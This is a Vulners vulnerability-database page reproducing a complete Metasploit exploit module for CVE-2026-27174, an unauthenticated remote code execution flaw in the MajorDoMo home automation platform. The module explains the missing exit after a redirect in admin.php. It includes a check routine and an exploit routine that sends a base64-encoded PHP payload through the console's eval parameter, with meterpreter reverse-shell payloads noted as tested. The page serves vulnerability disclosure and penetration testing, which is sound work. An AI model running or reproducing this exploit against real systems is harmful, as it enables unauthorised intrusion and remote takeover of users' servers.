Vulners
Lucene search
📄 MajorDoMo Console Eval Unauthenticated Remote Code Execution
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2026-27174 | 18 Feb 202621:10 | – | attackerkb |
 | CVE-2026-27174 | 18 Feb 202622:19 | – | circl |
 | MajorDoMo 代码注入漏洞 | 18 Feb 202600:00 | – | cnnvd |
 | CVE-2026-27174 | 18 Feb 202621:10 | – | cve |
 | CVE-2026-27174 MajorDoMo Unauthenticated Remote Code Execution via Admin Console Eval | 18 Feb 202621:10 | – | cvelist |
 | MajorDoMo Console Eval Unauthenticated RCE | 2 Mar 202618:58 | – | metasploit |
 | MajorDoMo - Unauthenticated RCE | 1 Jun 202605:38 | – | nuclei |
 | CVE-2026-27174 | 18 Feb 202622:16 | – | nvd |
 | 📄 MajorDoMo Remote Code Execution | 6 Mar 202600:00 | – | packetstorm |
 | PT-2026-20510 | 18 Feb 202600:00 | – | ptsecurity |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'MajorDoMo Console Eval Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated remote code execution vulnerability in
MajorDoMo, an open-source home automation platform. The admin panel's PHP console
is accessible without authentication due to a missing exit after redirect in
modules/panel.class.php. The redirect("/") call intended to block unauthenticated
users lacks an exit statement, so execution continues into the ajax panel handler
which includes inc_panel_ajax.php unconditionally. Inside, the console handler
passes the user-supplied command parameter directly to eval() via the evalConsole()
function. The command, ajax_panel, and op parameters are all controllable via GET
request through MajorDoMo's register_globals-style gr() function.
This results in unauthenticated PHP code evaluation via a single GET request
to /admin.php.
All versions of MajorDoMo up to and including the latest release are affected.
The fix is tracked in PR sergejey/majordomo#1177.
},
'Author' => [
'Valentin Lobstein <chocapikk[at]leakix.net>' # Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-27174'],
['URL', 'https://chocapikk.com/posts/2026/majordomo-revisited/'],
['URL', 'https://github.com/sergejey/majordomo/pull/1177']
],
'Targets' => [
[
'PHP In-Memory',
{
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell',
{
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2026-02-18',
'DefaultOptions' => {
'RPORT' => 80
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The base path to MajorDoMo', '/'])
])
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'method' => 'GET'
)
return CheckCode::Unknown('Failed to connect to the target.') unless res
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
return CheckCode::Safe('Target does not appear to be MajorDoMo') unless res.body.include?('MajorDoMo')
marker = Rex::Text.rand_text_alphanumeric(16)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'method' => 'GET',
'vars_get' => {
'ajax_panel' => '1',
'op' => 'console',
'command' => "echo '#{marker}';"
}
)
return CheckCode::Unknown('No response to console check') unless res
if res.body.include?(marker)
return CheckCode::Vulnerable('Console eval is accessible without authentication')
end
CheckCode::Safe('Console eval is not accessible')
end
def exploit
php_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
b64 = Rex::Text.encode_base64(php_payload)
command = "eval(base64_decode('#{b64}'));"
vprint_status('Sending payload via console eval...')
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'admin.php'),
'method' => 'GET',
'vars_get' => {
'ajax_panel' => '1',
'op' => 'console',
'command' => command
}
}, 5)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 49.3
CVSS 3.19.8
EPSS0.85411
SSVC